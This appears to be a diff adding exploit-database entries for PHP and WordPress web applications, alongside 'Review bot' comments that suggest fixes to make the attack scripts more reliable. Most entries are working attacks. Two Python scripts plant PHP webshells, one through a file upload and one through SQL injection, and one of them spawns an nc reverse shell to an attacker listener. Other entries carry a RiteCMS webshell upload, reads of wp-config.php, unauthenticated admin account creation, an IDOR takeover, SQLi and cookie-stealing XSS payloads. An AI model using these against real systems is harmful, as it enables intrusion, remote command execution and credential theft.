Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"
filemanager
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file"; filename="webshell.pHp"
Content-Type: application/octet-stream
<?php system($_GET[base64_decode('Y21k')]);?>
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="directory"
media
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file_name"
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_mode"
1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize"
640
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="compression"
80
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize"
150
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_compression"
70
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_file_submit"
OK - Upload file
-----------------------------410923806710384479662671954309--
####################
# Webshell access: #
####################
# Webshell access via:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id
# Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""
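Review bot: The Steps to Reproduce under "PoC for webshell using Method 2" are numbered `1, 2, 3, 4, 3, 4`, so the "Browse.." and "Upload .php file" steps collide; renumber them `1`-`6`. Everything after the header comments is a single triple-quoted string with no executable code, so if the file carries a `.py` extension (the path is not visible here) a top-of-file `# Advisory text only; this file contains no executable code` comment, or a `.txt` name, would set expectations for anyone running it.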


@ -0,0 +1,84 @@
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any
# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
# Description:
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:
===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
# Proof Of Concept:
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS is triggered.
# Solution:
Upgrade Contact Form Entries to version 1.1.7

86
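--- a/exploits/php/webapps/50619.py
+++ b/exploits/php/webapps/50619.py
@@ -0,0 +1,86 @@
+# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
+# Date 22/12/2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.plugins-market.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
+# Version: <= 4.7
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2021-24750
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md
+'''
+Description:
+The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
+available to any authenticated user, which could allow users with a role as low as
+subscriber to perform SQL injection attacks
+'''
+# Banner:
+banner = '''
+___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___
+/ __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \
+( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) )
+\___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/
+[+] WP Visitor Statistics SQL Injection
+[@] Developed by Ron Jost (Hacker5preme)
+'''
+print(banner)
+import argparse
+import requests
+from datetime import datetime
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+my_parser.add_argument('-C', '--COMMAND', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+command = args.COMMAND
+print('')
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+print('')
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+'Host': target_ip,
+'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+'Accept-Encoding': 'gzip, deflate',
+'Content-Type': 'application/x-www-form-urlencoded',
+'Origin': 'http://' + target_ip,
+'Connection': 'close',
+'Upgrade-Insecure-Requests': '1'
+}
+# Body:
+body = {
+'log': username,
+'pwd': password,
+'wp-submit': 'Log In',
+'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+# Exploit:
+exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
+exploit = session.get(exploit_url)
+print(exploit.text)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))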
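Review bot: `exploit_url` hard-codes `/wordpress/` while `auth_url` a few lines earlier is built from `wp_path`, so with any `-U` value other than `/wordpress/` the login and the admin-ajax request go to different paths; build both the same way, `exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=refDetails&requests=...'`. The login response `auth` is never inspected, so a failed login only shows up later as the unauthenticated HTML that admin-ajax.php returns; testing for the `wordpress_logged_in` cookie in `session.cookies` before the GET would make that failure explicit. `check` is assigned and never used, and every `-T`/`-P`/`-U` argument is optional, so a missing one produces a `TypeError` on string concatenation rather than a usage message (`required=True` on those three).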

56
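--- a/exploits/php/webapps/50621.py
+++ b/exploits/php/webapps/50621.py
@@ -0,0 +1,56 @@
+# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
+# Date: 22/12/2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Windows
+import requests
+import json
+url = input('Url:')
+if not url.startswith('http://') and not url.startswith('https://'):
+url = "http://" + url
+if not url.endswith('/'):
+url = url + "/"
+Username = "tago"
+Password = "tagoletta"
+reqUrl = url + "classes/Users.php?f=save"
+reqHeaders = {
+"Accept": "*/*",
+"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
+"X-Requested-With": "XMLHttpRequest",
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
+"Origin": url}
+reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"
+resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
+if resp.status_code == 200:
+print("Admin account created")
+reqUrl = url + "classes/Login.php?f=login"
+reqHeaders = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"X-Requested-With": "XMLHttpRequest",
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
+"Origin": url
+}
+reqData = {"username": ""+Username+"", "password": ""+Password+""}
+resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
+data = json.loads(resp.text)
+status = data["status"]
+if status == "success":
+print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
+else:
+print("Exploited but not loginned")
+else:
+print("Not injectable")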
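Review bot: `if resp.status_code == 200:` is treated as proof that the save succeeded and `"Admin account created"` is printed before the login step that actually confirms it; the save endpoint presumably answers 200 for a rejected submission as well, so that message belongs under `if status == "success":`. `json.loads(resp.text)` raises `json.JSONDecodeError` when the login reply is not JSON (an HTML error page, for instance) and `data["status"]` raises `KeyError` when the key is absent, so neither failure is reported as one; `data.get("status")` with the decode inside `try/except json.JSONDecodeError` would turn both into a printed failure. The hand-assembled multipart `reqData` with a fixed boundary could also be replaced by `requests.post(..., files=...)`, which builds the body and `Content-Type` header itself.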

71
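--- a/exploits/php/webapps/50622.py
+++ b/exploits/php/webapps/50622.py
@@ -0,0 +1,71 @@
+# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
+# Date: 22/12/2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Ubuntu
+# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.
+import requests
+import random
+import string
+from bs4 import BeautifulSoup
+url = input("TARGET = ")
+if not url.startswith('http://') and not url.startswith('https://'):
+url = "http://" + url
+if not url.endswith('/'):
+url = url + "/"
+payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+resp = requests.get(url)
+htmlParser = BeautifulSoup(resp.text, 'html.parser')
+getMenu = htmlParser.findAll("a", {"class": "nav-link"})
+selectPage = ""
+for i in getMenu:
+if "movie" in i.text.lower():
+selectPage = i["href"]
+break
+selectPage = selectPage.replace("./","")
+findSql = url + selectPage
+resp = requests.get(findSql)
+htmlParser = BeautifulSoup(resp.text, 'html.parser')
+movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
+sqlPage = movieList[0]["href"]
+sqlPage = sqlPage.replace("./","")
+sqlPage = url + sqlPage
+print("\nFinding path")
+findPath = requests.get(sqlPage + '\'')
+findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
+findPath = findPath[findPath.index("<b>")+3:len(findPath)]
+print("injection page: "+sqlPage)
+parser = findPath.split('\\')
+parser.pop()
+findPath = ""
+for find in parser:
+findPath += find + "/"
+print("\nFound Path : " + findPath)
+SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
+SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
+SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
+print("\n\nShell Uploading...")
+status = requests.get(sqlPage+SQLtoRCE)
+shellOutput = requests.get(url+shellname+".php?tago=whoami")
+print("\n\nShell Output : "+shellOutput.text)
+print("\nShell Path : " + url+shellname+".php")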
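Review bot: The path discovery at `findPath.text.index("<b>Warning</b>: ")` depends on the server echoing PHP warnings into the page; when `display_errors` is off, `str.index` raises `ValueError` and the script ends in a traceback rather than a message, and `movieList[0]` likewise raises `IndexError` when nothing matches the long class selector. Both conditions should be tested and reported (`if not movieList: raise SystemExit("no movie entry found")`, and the same for an empty `selectPage`). `from bs4 import BeautifulSoup` is a third-party dependency the header comments do not mention, and the response stored in `status` is never inspected, so a failed write is only noticed when the follow-up GET returns an error page. The `split('\\')` assumes a Windows-style path in the warning although the header says "Tested on: Ubuntu"; hedged, since the exact warning format is not visible here.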

88
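--- a/exploits/php/webapps/50623.py
+++ b/exploits/php/webapps/50623.py
@@ -0,0 +1,88 @@
+# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 23/12/2021
+# Exploit Author: Jeremiasz Pluta
+# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
+# Software Link: https://github.com/rskoolrash/Online-Admission-System
+# Tested on: LAMP Stack (Debian 10)
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import requests
+import time
+import subprocess
+print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')
+path = '/' #change me if the path to the /oas is in the root directory or another subdir
+class Exploit:
+def __init__(self, target_ip, target_port, localhost, localport):
+self.target_ip = target_ip
+self.target_port = target_port
+self.localhost = localhost
+self.localport = localport
+def exploitation(self):
+payload = """<?php system($_GET['cmd']); ?>"""
+payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
+url = 'http://' + target_ip + ':' + target_port + path
+r = requests.Session()
+print('[*] Resolving URL...')
+r1 = r.get(url + 'documents.php')
+time.sleep(3)
+#Upload the payload file
+print('[*] Uploading the webshell payload...')
+files = {
+'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
+'ftndoc': ('', '', 'application/octet-stream'),
+'ftcdoc': ('', '', 'application/octet-stream'),
+'fdmdoc': ('', '', 'application/octet-stream'),
+'ftcdoc': ('', '', 'application/octet-stream'),
+'fdcdoc': ('', '', 'application/octet-stream'),
+'fide': ('', '', 'application/octet-stream'),
+'fsig': ('', '', 'application/octet-stream'),
+}
+data = {'fpicup':'Submit Query'}
+r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
+time.sleep(3)
+print('[*] Setting up netcat listener...')
+listener = subprocess.Popen(["nc", "-nvlp", self.localport])
+time.sleep(3)
+print('[*] Spawning reverse shell...')
+print('[*] Watchout!')
+r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
+time.sleep(3)
+if (r3.status_code == 200):
+print('[*] Got shell!')
+while True:
+listener.wait()
+else:
+print('[-] Something went wrong!')
+listener.terminate()
+def get_args():
+parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
+parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
+parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
+args = parser.parse_args()
+return args
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()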
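Review bot: The `files` dict in `Exploit.exploitation` lists the key `'ftcdoc'` twice, so Python keeps only the second entry and the first is silently dropped; one of the two is presumably meant to be a different form field name (the form is not visible here, so check it against documents.php). In the same method `url` and `payload2` are built from the module-level `target_ip`, `target_port`, `localhost` and `localport` rather than from the attributes `__init__` stores, which leaves everything except `self.localport` unused and ties the class to script globals; `url = 'http://' + self.target_ip + ':' + self.target_port + path` and `self.localhost`/`self.localport` in `payload2` fix that. `url + '/studentpic/cmd.php?cmd='` also produces a double slash because `path` already ends in `/`, the `#!/usr/bin/python` shebang is not on line 1 and so has no effect, and `sys`, `re` and `r1` are unused.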

39
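--- a/exploits/php/webapps/50624.py
+++ b/exploits/php/webapps/50624.py
@@ -0,0 +1,39 @@
+# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
+# Date: 23/12/2021
+# Exploit Authors: Nicole Sheinin, Liad Levy
+# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
+# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
+# Version: versions <= 2.2.2
+# Tested on: MacOS
+# CVE: CVE-2021-39312
+# Github repo:
+#!/usr/bin/env python3
+import argparse, textwrap
+import requests
+import sys
+parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)
+group_must = parser.add_argument_group('must arguments')
+group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True)
+parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False)
+args = parser.parse_args()
+if len(sys.argv) <= 2:
+print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
+sys.exit()
+HOST = args.url
+PAYLOAD = args.payload
+url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
+payload = "/scripts/simple.php/{}".format(PAYLOAD)
+r = requests.post(url,data={'src': payload})
+if r.status_code == 200:
+print(r.text)
+else:
+print("No exploit found")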
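Review bot: `if r.status_code == 200:` is taken as proof that the requested file was returned, but a script that wraps an include in a normal page presumably answers 200 whether or not the path resolved, so `print("No exploit found")` is only reached on transport-level errors; checking `r.text` for content expected from the target file (for the default `wp-config.php`, a `DB_NAME` define) would be a more honest signal. `if len(sys.argv) <= 2:` after `parse_args()` is dead code, because `-u` is `required=True` and argparse has already exited with a usage message when it is missing, and the `f"..."` on the next line has no placeholders. `textwrap` is imported but never used, and the `#!/usr/bin/env python3` shebang is not on line 1, so it has no effect.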


@ -0,0 +1,20 @@
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: V 1.0
# Tested on: WAMPP
# Description #
Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.
# Proof of Concept (PoC) :
#Exploit:
1) Goto: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Goto: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script>
5) Click on Save
6) Our payload is fired and stored


@ -0,0 +1,19 @@
# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Date: 28/12/2021
# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
# Vendor Homepage: https://www.safarimontage.com/
# Version: 8.3 and 8.5
# Tested on: Ubuntu Linux [Firefox]
# CVE: CVE-2021-45425
# Proof of Concept:
GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
Host: vulnIP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=SSSION; lang=en
Connection: close


@ -0,0 +1,31 @@
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)
Payload:
username: 1' or 1=1;--
password: \
Proof of Concept:
POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1
username=1%27+or+1%3D1%3B--&password=%5C&form_login=log


@ -0,0 +1,15 @@
# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
# Date: 26/12/2021
# Exploit Author: Chinmay Vishwas Divekar
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Tested on: PopOS_20.10
*Steps to reproduce*
1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php
2) Enter xss payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields.
3) Server Accepted our Payload in input fileds.
Affected input fields: Correspondence Address, Guardian Relation, Permanent Address


@ -0,0 +1,22 @@
# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4
*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.
*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
*Steps to reproduce:*
Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
http://localhost/hprms/admin/?page=patients/view_patient&id=1
Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY
Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.


@ -0,0 +1,122 @@
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4
*Insecure direct object references (IDOR)*
Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system.
*Attack Vector*
An attacker can takeover the Administrator's account
*Steps of reproduce:*
Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'.
=====================================================================================================================================
Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account'
http://localhost/hprms/admin/?page=user
=====================================================================================================================================
Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite:
POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"
4
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"
user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"
admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------17632878732301879013646251239--
=====================================================================================================================================
Step-3: Change parameter id '4' to id '1'
POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"
1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"
user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"
admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------17632878732301879013646251239--
=====================================================================================================================================
step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.


@ -0,0 +1,35 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04
[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
